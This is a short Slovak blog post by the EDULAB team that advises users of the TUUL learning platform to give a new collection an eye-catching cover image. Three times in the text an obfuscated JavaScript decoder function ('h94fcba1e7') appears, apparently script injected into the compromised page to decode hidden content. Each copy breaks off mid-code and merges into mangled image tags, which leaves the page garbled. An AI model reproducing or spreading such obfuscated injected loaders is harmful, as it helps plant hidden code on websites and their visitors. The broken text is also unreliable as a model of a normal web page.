BLOG

Ako zviditeľniť svoj nový TUUL?

 
duha

function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6ze-medium wp-image-30352 alignright" alt="obr6" src="http://tuul.sk/wp-content/uploads/2014/02/obr6-300x171.png" width="300" height="171" />Dnes možno viac ako v minulosti platí, že obsah predáva dobrá reklama a lákavý obal. Sami si odpovedzme na otázku: „Kam by sme ako nezaujatí užívatelia klikli pri nasledovných obrázkoch?“

Nepodceňujme pri tvorbe TUUlu ľudské zmysly. Každý novovytvorený materiál by mal mať ambíciu zaujať v záplave konkurencie.function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6ze-medium wp-image-30353 alignright" alt="obr11" src="http://tuul.sk/wp-content/uploads/2014/02/obr11-300x199.png" width="300" height="199" />

Preto, ak vytvárame nový TUUL, bude ľahšie identifikovateľný a zaujme oveľa viac ľudí, ak mu dáme krajší obal. Stačí vložiť ako prvý materiál do nášho TUULu estetický obrázok, ktorý charakterizuje našu tému (poprípade ktorémukoľvek inému z jedného z materiálov v úpravách zaškrtneme možnosť „Použiť ako náhľadový obrázok materiálu“.)

function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6ze-full wp-image-30361" alt="tuulgif-obr" src="http://tuul.sk/wp-content/uploads/2014/02/tuulgif-obr.gif" width="913" height="556" />

EDULAB tím